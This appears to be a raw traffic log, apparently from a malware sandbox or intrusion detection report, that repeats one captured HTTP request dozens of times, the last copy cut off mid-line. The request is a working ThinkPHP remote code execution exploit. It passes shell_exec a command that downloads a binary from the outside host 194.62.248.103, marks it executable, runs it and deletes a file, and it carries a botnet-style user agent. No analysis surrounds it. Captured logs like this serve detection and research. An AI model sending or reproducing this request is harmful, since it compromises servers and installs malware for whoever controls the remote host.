    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /UserData Raw: Data Ascii:
